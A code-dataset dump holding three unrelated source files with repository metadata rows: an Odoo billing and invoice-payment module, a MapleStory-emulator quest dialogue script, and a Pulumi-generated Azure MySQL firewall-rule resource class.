'res_model': 'billing.form',
'type': 'ir.actions.act_window',
'nodestroy': True,
'target': 'current',
'res_id': self.ids and self.ids[0] or False,
}
@api.model
def default_get(self, fields):
'''Function to auto fill events for the selected event's interpreter '''
res = {}
res = super(billing_form , self).default_get(fields)
event_id = self._context.get('event_id', [])
if not event_id :
return res
event = self.env['event'].browse(event_id)
# history_obj = self.pool.get('interpreter.alloc.history')
event_ids, select_ids = [], []
select_obj = self.env['event.lines']
event_obj = self.env['event']
if event_id:
if event.event_type == 'language':
if event.assigned_interpreters:#,('event_date','=',event.event_date)
# print "assgnd intrptr M2m+++++++++",event.assigned_interpreters
for interpreter in event.assigned_interpreters:
if self._context.get('search_default_state',False):
if self._context.get('search_default_state') == 'unbilled':
event_ids.extend(event_obj.search([('assigned_interpreters','in',[interpreter.id]),('state','=','unbilled'),
('event_start_date','=',event.event_start_date)],).ids)
else:
event_ids.extend(event_obj.search([('assigned_interpreters','in',[interpreter.id]),('state','=','invoiced'),
('event_start_date','=',event.event_start_date)],).ids)
else:
event_ids.extend(event_obj.search([('assigned_interpreters','in',[interpreter.id]),('state','in',('invoiced','unbilled')),
('event_start_date','=',event.event_start_date)],).ids)
# print "in loop+",event_ids
# print "out loop+", list(set(event_ids))
for event_id in list(set(event_ids)):
event_brwsd = event_obj.browse(event_id)
select_ids.append(select_obj.create({'event_id': event_id,'name': event_brwsd.name}).id)
if event.event_type == 'transport':
if event.transporter_id:#,('event_date','=',event.event_date)
if self._context.get('search_default_state',False):
if self._context.get('search_default_state') == 'unbilled':
event_ids = event_obj.search([('transporter_id','=',event.transporter_id.id),('state','=','unbilled'),('event_start_date','=',event.event_start_date)])
else:
event_ids = event_obj.search([('transporter_id','=',event.transporter_id.id),('state','=','invoiced'),('event_start_date','=',event.event_start_date)])
else:
event_ids = event_obj.search([('transporter_id','=',event.transporter_id.id),('state','in',('invoiced','unbilled')),('event_start_date','=',event.event_start_date)])
for event_brwsd in event_ids:
select_ids.append(select_obj.create({'event_id': event_id,'name': event_brwsd.name}).id)
if event.event_type == 'translation':
if event.translator_id:#,('event_date','=',event.event_date)
if self._context.get('search_default_state',False):
if self._context.get('search_default_state') == 'unbilled':
event_ids = event_obj.search([('translator_id','=',event.translator_id.id),('state','=','unbilled'),('event_start_date','=',event.event_start_date)])
else:
event_ids = event_obj.search([('translator_id','=',event.translator_id.id),('state','=','invoiced'),('event_start_date','=',event.event_start_date)])
else:
event_ids = event_obj.search([('translator_id','=',event.translator_id.id),('state','in',('invoiced','unbilled')),('event_start_date','=',event.event_start_date)])
for event_brwsd in event_ids:
select_ids.append(select_obj.create({'event_id': event_id,'name': event_brwsd.name}).id)
if event.event_type == 'lang_trans' :
# if event.interpreter_id:#,('event_date','=',event.event_date)
#
# event_ids = event_obj.search( cr ,uid ,[('interpreter_id','=',event.interpreter_id.id),('transporter_id','=',event.transporter_id.id),('state','in',('invoiced','unbilled')),('event_start_date','=',event.event_start_date)],)
# for event_id in event_ids:
# event_brwsd = event_obj.browse(cr, uid,event_id )
# select_ids.append(select_obj.create(cr ,uid ,{'event_id': event_id,'name': event_brwsd.name}))
if event.assigned_interpreters:
for interpreter in event.assigned_interpreters:
if self._context.get('search_default_state',False):
if self._context.get('search_default_state') == 'unbilled':
event_ids.extend(event_obj.search([('assigned_interpreters','in',[interpreter.id]),('transporter_id','=',event.transporter_id.id),
('state','=','unbilled'),('event_start_date','=',event.event_start_date)]).ids)
else:
event_ids.extend(event_obj.search([('assigned_interpreters','in',[interpreter.id]),('transporter_id','=',event.transporter_id.id),
('state','=','invoiced'),('event_start_date','=',event.event_start_date)]).ids)
else:
event_ids.extend(event_obj.search([('assigned_interpreters','in',[interpreter.id]),('transporter_id','=',event.transporter_id.id),
('state','in',('invoiced','unbilled')),('event_start_date','=',event.event_start_date)],).ids)
# print "in loop+",event_ids
# print "out loop+", list(set(event_ids))
for event_id in list(set(event_ids)):
event_brwsd = event_obj.browse(event_id)
select_ids.append(select_obj.create({'event_id': event_id,'name': event_brwsd.name}).id)
#
# -------------------- Mehul code-------------------------------------------
event_obj = self.env['event']
for event_id in list(set(event_ids)):
date_new = event_obj.browse(event_id)
date_chg = date_new.event_start_date
res['invoice_date'] = date_chg
res['event_lines']= [(6, 0, select_ids)]
return res
@api.model
def create(self,vals):
''' Event_start and event_end fields are prepared and validated for further flow'''
# Here formatting for Event Start date and Event End Date is done according to timezone of user or server
if 'event_start_date' in vals or 'event_start_hr' in vals or 'event_start_min' in vals or 'event_end_hr' in vals or \
'event_end_min' in vals or 'am_pm' in vals or 'am_pm2' in vals or 'customer_timezone' in vals:
DATETIME_FORMAT = "%Y-%m-%d %H:%M:%S"
# get user's timezone
user = self.env.user
customer_timezone = vals.get('customer_timezone',False)
if customer_timezone:
tz = pytz.timezone(customer_timezone) or pytz.utc
elif user.tz:
tz = pytz.timezone(user.tz) or pytz.utc
else:
tz = pytz.timezone("US/Pacific") or pytz.utc
event_start_date = vals.get('event_start_date',False)
event_start_hr = int(vals.get('event_start_hr',0.0))
event_start_min = int(vals.get('event_start_min',0.0))
event_end_hr = int(vals.get('event_end_hr',0.0))
event_end_min = int(vals.get('event_end_min',0.0))
am_pm = vals.get('am_pm',False)
am_pm2 = vals.get('am_pm2',False)
#print "event_date ,event_start_hr,event_start_min ,event_end_hr,event_end_min, am_pm,am_pm2........",event_start_date,event_start_hr,event_start_min,event_end_hr,event_end_min,am_pm,am_pm2
if event_start_hr and event_start_hr > 12:
raise UserError(_("Event start time hours can't be greater than 12 "))
if event_start_min and event_start_min > 59:
raise UserError(_("Event start time minutes can't be greater than 59 "))
if event_end_hr and event_end_hr > 12:
raise UserError(_(" Event end time hours can't be greater than 12 "))
if event_end_min and event_end_min > 59:
raise UserError(_("Event end time minutes can't be greater than 59 "))
if event_start_hr < 1 and event_start_min < 1:
raise UserError(_("Event start time can not be 0 or less than 0"))
if event_end_hr < 1 and event_end_min < 1:
raise UserError(_("Event end time can not be 0 or less than 0"))
if event_start_date:
if am_pm and am_pm == 'pm':
if event_start_hr < 12:
event_start_hr += 12
if am_pm and am_pm == 'am':
if event_start_hr == 12:
event_start_hr = 0
#print "event_start_hr...event_start_min......",event_start_hr,event_start_min
if event_start_hr == 24: # for the 24 hour format
event_start_hr = 23
event_start_min = 59
#print "event_start_hr...event_start_min......",event_start_hr,event_start_min
event_start = str(event_start_date) + ' ' + str(event_start_hr) + ':' + str(event_start_min) + ':00'
#print 'event_start.......',event_start
local_dt = tz.localize(datetime.datetime.strptime(event_start,DATETIME_FORMAT), is_dst=None)
#print "local_dt........",local_dt
utc_dt = local_dt.astimezone (pytz.utc).strftime (DATETIME_FORMAT)
#print "utc_dt.........",utc_dt
vals['event_start'] = utc_dt
if am_pm2 and am_pm2 == 'pm':
if event_end_hr < 12:
event_end_hr += 12
if am_pm2 and am_pm2 == 'am':
if event_end_hr == 12:
event_end_hr = 0
#print "event_end_hr...event_end_min......",event_end_hr,event_end_min
if event_end_hr == 24: # for the 24 hour format
event_end_hr = 23
event_end_min = 59
#print "event_end_hr...event_end_min......",event_end_hr,event_end_min
event_end = str(event_start_date) + ' ' + str(event_end_hr) + ':' + str(event_end_min) + ':00'
#print 'event_end.......',event_end
local_dt1 = tz.localize(datetime.datetime.strptime(event_end,DATETIME_FORMAT), is_dst=None)
#print "local_dt1........",local_dt1
utc_dt1 = local_dt1.astimezone (pytz.utc).strftime (DATETIME_FORMAT)
#print "utc_dt1.........",utc_dt1
vals['event_end'] = utc_dt1
if datetime.datetime.strptime(event_end,DATETIME_FORMAT) < datetime.datetime.strptime(event_start,DATETIME_FORMAT):
raise UserError(_('Event start time cannot be greater than event end time.'))
elif datetime.datetime.strptime(event_end,DATETIME_FORMAT) == datetime.datetime.strptime(event_start,DATETIME_FORMAT):
raise UserError(_('Event start time and end time cannot be identical.'))
return super(billing_form, self).create(vals)
@api.multi
def write(self, vals):
''' Event_start and event_end fields are prepared and validated for further flow'''
#print "vals...",vals
# Updating Invoice date on Save of Billing Form
if vals.get('invoice_date',False):
eve = self.selected_event_id
if not eve:
if 'selected_event_id' in vals and vals['selected_event_id']:
eve = self.env['event'].browse(vals.get('selected_event_id'))
invoices = []
if eve and eve.cust_invoice_id:
invoices.append(eve.cust_invoice_id)
if eve:
invoices.extend([inv_id for inv_id in eve.supp_invoice_ids if inv_id])
if eve and eve.supp_invoice_id2:
invoices.append(eve.supp_invoice_id2)
# print "invices++++++++++=",invoices
if invoices:
for each_inv in invoices:
if each_inv.state not in ['paid','cancel']:
each_inv.write({'date_invoice':vals.get('invoice_date',False)})
# raise osv.except_osv(_('Error!'), _("Cannot change Invoice Date as one or more invoices are in Paid or Cancelled state"))
# Here formatting for Event Start date and Event End Date is done according to timezone of user or server
if 'event_start_date' in vals or 'event_start_hr' in vals or 'event_start_min' in vals or 'event_end_hr' in vals or \
'event_end_min' in vals or 'am_pm' in vals or 'am_pm2' in vals or 'customer_timezone' in vals :
DATETIME_FORMAT = "%Y-%m-%d %H:%M:%S"
# get user's timezone
user = self.env.user
cur_obj = self
tz = False
customer_timezone = False
#print "vals['customer_timezone']........",vals['customer_timezone']
if 'customer_timezone' in vals and vals['customer_timezone']:
customer_timezone = vals.get('customer_timezone',False)
else:
customer_timezone = cur_obj.customer_timezone
#print "customer_timezone..........",customer_timezone
if customer_timezone:
tz = pytz.timezone(customer_timezone) or pytz.utc
elif user.tz:
tz = pytz.timezone(user.tz) or pytz.utc
else:
tz = pytz.timezone("US/Pacific") or pytz.utc
#print "tz...........",tz
event_start_date ,event_start_hr ,event_start_min = False , 0 ,0
event_end_hr , event_end_min , am_pm , am_pm2 = 0 , 0 , 'am' , 'pm'
if 'event_start_date' in vals and vals['event_start_date']:
event_start_date = vals.get('event_start_date',False)
else:
event_start_date = cur_obj.event_start_date
if 'event_start_hr' in vals :
event_start_hr = int(vals.get('event_start_hr',0.0))
else:
event_start_hr = int(cur_obj.event_start_hr)
if 'event_start_min' in vals :
event_start_min = int(vals.get('event_start_min',0.0))
else:
event_start_min = int(cur_obj.event_start_min)
if 'event_end_hr' in vals :
event_end_hr = int(vals.get('event_end_hr',0.0))
else:
event_end_hr = int(cur_obj.event_end_hr)
if 'event_end_min' in vals :
event_end_min = int(vals.get('event_end_min',0.0))
else:
event_end_min = int(cur_obj.event_end_min)
if 'am_pm' in vals and vals['am_pm']:
am_pm = vals.get('am_pm',False)
else:
am_pm = cur_obj.am_pm
if 'am_pm2' in vals and vals['am_pm2']:
am_pm2 = vals.get('am_pm2',False)
else:
am_pm2 = cur_obj.am_pm2
#print "event_date ,event_start_hr,event_start_min ,event_end_hr,event_end_min, am_pm,am_pm2........",event_start_date,event_start_hr,event_start_min,event_end_hr,event_end_min,am_pm,am_pm2
if event_start_hr and event_start_hr > 12:
raise UserError(_("Event start time hours can't be greater than 12 "))
if event_start_min and event_start_min > 59:
raise UserError(_("Event start time minutes can't be greater than 59 "))
# if (event_start_hr and event_start_min) and (event_start_hr == 12 and event_start_min > 0):
# raise osv.except_osv(_('Check Start time!'), _("Event start time can't be greater than 12 O'clock "))
if event_end_hr and event_end_hr > 12:
raise UserError(_(" Event end time hours can't be greater than 12 "))
if event_end_min and event_end_min > 59:
raise UserError(_("Event end time minutes can't be greater than 59 "))
# if (event_end_hr and event_end_min) and (event_end_hr == 12 and event_end_min > 0):
# raise osv.except_osv(_('Check End time!'), _("Event End time can't be greater than 12 O'clock "))
if event_start_hr < 1 and event_start_min < 1:
raise UserError(_("Event start time can not be 0 or less than 0"))
if event_end_hr < 1 and event_end_min < 1:
raise UserError(_("Event end time can not be 0 or less than 0"))
if event_start_date:
if am_pm and am_pm == 'pm':
if event_start_hr < 12:
event_start_hr += 12
if am_pm and am_pm == 'am':
if event_start_hr == 12:
event_start_hr = 0
#print "event_start_hr...event_start_min......",event_start_hr,event_start_min
if event_start_hr == 24: # for the 24 hour format
event_start_hr = 23
event_start_min = 59
#print "event_start_hr...event_start_min......",event_start_hr,event_start_min
event_start = str(event_start_date) + ' ' + str(event_start_hr) + ':' + str(event_start_min) + ':00'
#print 'event_start.......',event_start
local_dt = tz.localize(datetime.datetime.strptime(event_start,DATETIME_FORMAT), is_dst=None)
#print "local_dt........",local_dt
utc_dt = local_dt.astimezone (pytz.utc).strftime (DATETIME_FORMAT)
#print "utc_dt.........",utc_dt
vals['event_start'] = utc_dt
if am_pm2 and am_pm2 == 'pm':
if event_end_hr < 12:
event_end_hr += 12
if am_pm2 and am_pm2 == 'am':
if event_end_hr == 12:
event_end_hr = 0
#print "event_end_hr...event_end_min......",event_end_hr,event_end_min
if event_end_hr == 24: # for the 24 hour format
event_end_hr = 23
event_end_min = 59
#print "event_end_hr...event_end_min......",event_end_hr,event_end_min
event_end = str(event_start_date) + ' ' + str(event_end_hr) + ':' + str(event_end_min) + ':00'
#print 'event_end.......',event_end
local_dt1 = tz.localize(datetime.datetime.strptime(event_end,DATETIME_FORMAT), is_dst=None)
#print "local_dt1........",local_dt1
utc_dt1 = local_dt1.astimezone (pytz.utc).strftime (DATETIME_FORMAT)
#print "utc_dt1.........",utc_dt1
vals['event_end'] = utc_dt1
if datetime.datetime.strptime(event_end,DATETIME_FORMAT) < datetime.datetime.strptime(event_start,DATETIME_FORMAT):
raise UserError(_('Event start time cannot be greater than event end time.'))
elif datetime.datetime.strptime(event_end,DATETIME_FORMAT) == datetime.datetime.strptime(event_start,DATETIME_FORMAT):
raise UserError(_('Event start time and end time cannot be identical.'))
#print "vals........",vals
return super(billing_form , self).write(vals)
class account_invoice(models.Model):
_inherit='account.invoice'
@api.multi
def pay_customer_invoice(self,journal_id, amount):
''' Function to pay Customer Invoices '''
inv_obj = self
invoice_number = inv_obj.number
payment_obj = self.env['account.payment']
period_obj = self.env['account.period']
# bank_journal_ids = journal_pool.search(cr, uid, [('type', '=', 'bank'),('company_id', '=', inv_obj.company_id.id)])
# #print "bank_journal_ids.........",bank_journal_ids
# if not len(bank_journal_ids):
# return True
bank_journal_ids = [journal_id]
payment_partner_id = inv_obj.partner_id.id
if inv_obj.partner_id.parent_id:
payment_partner_id = inv_obj.partner_id.parent_id.id
self=self.with_context(
default_partner_id=payment_partner_id or inv_obj.partner_id.id,
default_amount=amount,
default_name=inv_obj.name,
close_after_process=True,
invoice_type=inv_obj.type,
invoice_id=inv_obj.id,
journal_id=bank_journal_ids[0],
default_type=inv_obj.type in ('out_invoice','out_refund') and 'receipt' or 'payment'
)
if inv_obj.type in ('out_refund','in_refund'):
self=self.with_context(default_amount=-amount)
date = fields.Date.context_today(self)
payment_method_id=self.env['account.payment.method'].search([('payment_type','=','inbound')],limit=1).id
#print "inv_obj.period_id.id.......",inv_obj.period_id.id
# For using selected move lines only for payment in voucher
# context['move_line_ids'] = []
# if inv_obj.move_id:
# for move_line in inv_obj.move_id.line_id:
# context['move_line_ids'].append(move_line.id)
# if inv_obj.type in ('out_refund','in_refund'):
# amount = -amount
# res = payment_obj.onchange_partner_id(cr, uid, [], voucher_partner_id or inv_obj.partner_id.id, bank_journal_ids[0], amount, inv_obj.currency_id.id, account_data['value']['type'], date, context=context)
# else:
# res = voucher_pool.onchange_partner_id(cr, uid, [], voucher_partner_id or inv_obj.partner_id.id, bank_journal_ids[0], amount, inv_obj.currency_id.id, account_data['value']['type'], date, context=context)
#print "res.......",res
payment_data = {
'period_id': inv_obj.period_id.id,
'partner_id': payment_partner_id or inv_obj.partner_id.id,
'journal_id':bank_journal_ids[0],
'currency_id': inv_obj.currency_id.id,
'reference': inv_obj.name or '', #payplan.name +':'+salesname
'amount': amount,
'state': 'draft',
'name': '',
'payment_date': inv_obj.date_invoice or fields.Date.context_today(self),
'company_id': inv_obj.company_id and inv_obj.company_id.id or False,
'payment_method_id':payment_method_id,
'payment_type': 'inbound',
'partner_type': 'customer',
'invoice_ids': [(4, inv_obj.id, None)]
}
if self._context.get('check_number',False):
payment_data['check_number'] = self._context.get('check_number')
if not payment_data['period_id']:
self=self.with_context(company_id=inv_obj.company_id and inv_obj.company_id.id )
period_ids = period_obj.find(inv_obj.date_invoice)
period_id = period_ids and period_ids[0] or False
payment_data.update({'period_id':period_id})
#print "context......",context
# print "voucher_data........",voucher_data
payment_id = payment_obj.create(payment_data)
logger = logging.getLogger('test2')
logger.info("This is invoice ids------->%s " % str(payment_id.invoice_ids))
logger.info("This is payment type------->%s " % str(payment_id.payment_type))
logger.info("This is dest account id------->%s " % str(payment_id.destination_account_id))
logger.info("This is partner id------->%s " % str(payment_id.partner_id))
payment_id.post()
# print "voucher_id..........",voucher_id
return payment_id.id
@api.model
def get_accounts_supplier(self,partner_id=False, journal_id=False):
"""price
Returns a dict that contains new values and context
@param partner_id: latest value from user input for field partner_id
@param args: other arguments
@param context: context arguments, like lang, time zone
@return: Returns a dict which contains new values, and context
"""
default = {
'value':{},
}
if not partner_id or not journal_id:
return default
partner_pool = self.env['res.partner']
journal_pool = self.env['account.journal']
journal = journal_pool.browse(journal_id)
partner = partner_pool.browse(partner_id)
account_id = False
tr_type = False
if journal.type =='sale':
account_id = partner.property_account_receivable_id.id
tr_type = 'inbound'
elif journal.type == 'purchase':
account_id = partner.property_account_payable_id.id
tr_type = 'outbound'
default['value']['account_id'] = account_id
default['value']['type'] = tr_type
return default
@api.multi
def pay_supplier_invoice(self,journal_id, amount):
''' Function to pay Supplier Invoice '''
res, voucher_id = {}, False
inv_obj = self
invoice_number = inv_obj.number
payment_obj = self.env['account.payment']
period_obj = self.env['account.period']
# bank_journal_ids = journal_pool.search(cr, uid, [('type', '=', 'bank'),('company_id', '=', inv_obj.company_id.id)])
# #print "bank_journal_ids.........",bank_journal_ids
# if not len(bank_journal_ids):
# return True
bank_journal_ids = [journal_id]
payment_partner_id = inv_obj.partner_id.id
if inv_obj.partner_id.parent_id:
payment_partner_id = inv_obj.partner_id.parent_id.id
self=self.with_context(
default_partner_id=payment_partner_id or inv_obj.partner_id.id,
default_amount=amount,
default_name=inv_obj.name,
close_after_process=True,
invoice_type=inv_obj.type,
invoice_id=inv_obj.id,
journal_id=bank_journal_ids[0],
default_type='payment'
)
# print "context.......",context
date = fields.Date.context_today(self)
payment_method_id = self.env['account.payment.method'].search([('payment_type', '=', 'outbound')], limit=1).id
# For using payment of customer instead of contact
payment_data = {
'period_id': inv_obj.period_id.id,
'partner_id': payment_partner_id,
'journal_id': bank_journal_ids[0],
'currency_id': inv_obj.currency_id.id,
'reference': inv_obj.name or '', #payplan.name +':'+salesname
'amount': amount,
'payment_type': 'outbound',
'state': 'draft',
'name': '',
'date': inv_obj.date_invoice or fields.Date.context_today(self),
'company_id': inv_obj.company_id and inv_obj.company_id.id or False,
'payment_method_id':payment_method_id,
'partner_type':'supplier',
'invoice_ids': [(4, inv_obj.id, None)],
}
if not payment_data['period_id']:
self=self.with_context(company_id=inv_obj.company_id and inv_obj.company_id.id or False)
period_ids = period_obj.find(inv_obj.date_invoice)
period_id = period_ids and period_ids[0] or False
payment_data.update({'period_id':period_id})
#print "context......",context
# print "voucher_data.aaa.......",voucher_data
payment_id = payment_obj.create(payment_data)
# print "voucher_id......",voucher_id
payment_id.post()
#aaa
return payment_id.id
| [
"Vicky@planet-odoo.com"
] | Vicky@planet-odoo.com |
9a99affd9330d2197cca6838b31c5b0ee9a601f9 | a9fc496e0724866093dbb9cba70a8fdce12b67a9 | /scripts/quest/q38997s.py | 70187343f30d734e3f2f0de50048ea1ff1017575 | [
"MIT"
] | permissive | ryantpayton/Swordie | b2cd6b605f7f08f725f5e35d23ba3c22ef2ae7c0 | ca6f42dd43f63b1d2e6bb5cdc8fc051c277f326e | refs/heads/master | 2022-12-01T09:46:47.138072 | 2020-03-24T10:32:20 | 2020-03-24T10:32:20 | 253,997,319 | 2 | 0 | MIT | 2022-11-24T08:17:54 | 2020-04-08T05:50:22 | Java | UTF-8 | Python | false | false | 906 | py | # 410000002
MOONBEAM = 3002100
sm.setSpeakerID(MOONBEAM)
sm.sendNext("Let's start with #b[Fox Trot]#k. If you really do have ears, perk them up for this!")
sm.sendSay("#b[Fox Trot]#k is super helpful when you want to move quickly or get close to an enemy. You're way too slow to catch prey, so you need all the help you can get.")
sm.sendSay("Now try using #b[Fox Trot]#k. Oh, and it's a lot easier if you hotkey it and use it that way!")
sm.startQuest(parentID)
sm.sendNext("Whaddaya think? Was that amazingly fast, or what? Use this skill to get close to your prey.")
sm.sendSay("Use this skill when you're using other skills to #binterrupt#k the first one and #bmove#k quickly!")
sm.sendSay("I know you can be a little slow, Shade. Are you keeping up?")
sm.sendSay("I'll tell you how to use it to make up for your weakness. Talk to me when you're ready!")
sm.completeQuest(parentID)
sm.giveExp(700)
| [
"mechaviv@gmail.com"
] | mechaviv@gmail.com |
7588a1f1d54c158868ca7d9adccae62c33984539 | 5e6d8b9989247801718dd1f10009f0f7f54c1eb4 | /sdk/python/pulumi_azure_native/dbformysql/v20210501/firewall_rule.py | badcbf6bc5c32f77ee493d353ec35ac77c0890c9 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | vivimouret29/pulumi-azure-native | d238a8f91688c9bf09d745a7280b9bf2dd6d44e0 | 1cbd988bcb2aa75a83e220cb5abeb805d6484fce | refs/heads/master | 2023-08-26T05:50:40.560691 | 2021-10-21T09:25:07 | 2021-10-21T09:25:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,069 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = ['FirewallRuleArgs', 'FirewallRule']
@pulumi.input_type
class FirewallRuleArgs:
def __init__(__self__, *,
end_ip_address: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
server_name: pulumi.Input[str],
start_ip_address: pulumi.Input[str],
firewall_rule_name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a FirewallRule resource.
:param pulumi.Input[str] end_ip_address: The end IP address of the server firewall rule. Must be IPv4 format.
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
:param pulumi.Input[str] server_name: The name of the server.
:param pulumi.Input[str] start_ip_address: The start IP address of the server firewall rule. Must be IPv4 format.
:param pulumi.Input[str] firewall_rule_name: The name of the server firewall rule.
"""
pulumi.set(__self__, "end_ip_address", end_ip_address)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "server_name", server_name)
pulumi.set(__self__, "start_ip_address", start_ip_address)
if firewall_rule_name is not None:
pulumi.set(__self__, "firewall_rule_name", firewall_rule_name)
@property
@pulumi.getter(name="endIpAddress")
def end_ip_address(self) -> pulumi.Input[str]:
"""
The end IP address of the server firewall rule. Must be IPv4 format.
"""
return pulumi.get(self, "end_ip_address")
@end_ip_address.setter
def end_ip_address(self, value: pulumi.Input[str]):
pulumi.set(self, "end_ip_address", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group. The name is case insensitive.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="serverName")
def server_name(self) -> pulumi.Input[str]:
"""
The name of the server.
"""
return pulumi.get(self, "server_name")
@server_name.setter
def server_name(self, value: pulumi.Input[str]):
pulumi.set(self, "server_name", value)
@property
@pulumi.getter(name="startIpAddress")
def start_ip_address(self) -> pulumi.Input[str]:
"""
The start IP address of the server firewall rule. Must be IPv4 format.
"""
return pulumi.get(self, "start_ip_address")
@start_ip_address.setter
def start_ip_address(self, value: pulumi.Input[str]):
pulumi.set(self, "start_ip_address", value)
@property
@pulumi.getter(name="firewallRuleName")
def firewall_rule_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the server firewall rule.
"""
return pulumi.get(self, "firewall_rule_name")
@firewall_rule_name.setter
def firewall_rule_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "firewall_rule_name", value)
class FirewallRule(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
end_ip_address: Optional[pulumi.Input[str]] = None,
firewall_rule_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
start_ip_address: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Represents a server firewall rule.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] end_ip_address: The end IP address of the server firewall rule. Must be IPv4 format.
:param pulumi.Input[str] firewall_rule_name: The name of the server firewall rule.
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
:param pulumi.Input[str] server_name: The name of the server.
:param pulumi.Input[str] start_ip_address: The start IP address of the server firewall rule. Must be IPv4 format.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: FirewallRuleArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Represents a server firewall rule.
:param str resource_name: The name of the resource.
:param FirewallRuleArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(FirewallRuleArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
end_ip_address: Optional[pulumi.Input[str]] = None,
firewall_rule_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
start_ip_address: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = FirewallRuleArgs.__new__(FirewallRuleArgs)
if end_ip_address is None and not opts.urn:
raise TypeError("Missing required property 'end_ip_address'")
__props__.__dict__["end_ip_address"] = end_ip_address
__props__.__dict__["firewall_rule_name"] = firewall_rule_name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if server_name is None and not opts.urn:
raise TypeError("Missing required property 'server_name'")
__props__.__dict__["server_name"] = server_name
if start_ip_address is None and not opts.urn:
raise TypeError("Missing required property 'start_ip_address'")
__props__.__dict__["start_ip_address"] = start_ip_address
__props__.__dict__["name"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:dbformysql/v20210501:FirewallRule"), pulumi.Alias(type_="azure-native:dbformysql/v20200701preview:FirewallRule"), pulumi.Alias(type_="azure-nextgen:dbformysql/v20200701preview:FirewallRule"), pulumi.Alias(type_="azure-native:dbformysql/v20200701privatepreview:FirewallRule"), pulumi.Alias(type_="azure-nextgen:dbformysql/v20200701privatepreview:FirewallRule"), pulumi.Alias(type_="azure-native:dbformysql/v20210501preview:FirewallRule"), pulumi.Alias(type_="azure-nextgen:dbformysql/v20210501preview:FirewallRule")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(FirewallRule, __self__).__init__(
'azure-native:dbformysql/v20210501:FirewallRule',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'FirewallRule':
"""
Get an existing FirewallRule resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = FirewallRuleArgs.__new__(FirewallRuleArgs)
__props__.__dict__["end_ip_address"] = None
__props__.__dict__["name"] = None
__props__.__dict__["start_ip_address"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
return FirewallRule(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="endIpAddress")
def end_ip_address(self) -> pulumi.Output[str]:
"""
The end IP address of the server firewall rule. Must be IPv4 format.
"""
return pulumi.get(self, "end_ip_address")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the resource
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="startIpAddress")
def start_ip_address(self) -> pulumi.Output[str]:
"""
The start IP address of the server firewall rule. Must be IPv4 format.
"""
return pulumi.get(self, "start_ip_address")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
"""
The system metadata relating to this resource.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
"""
return pulumi.get(self, "type")
| [
"noreply@github.com"
] | vivimouret29.noreply@github.com |
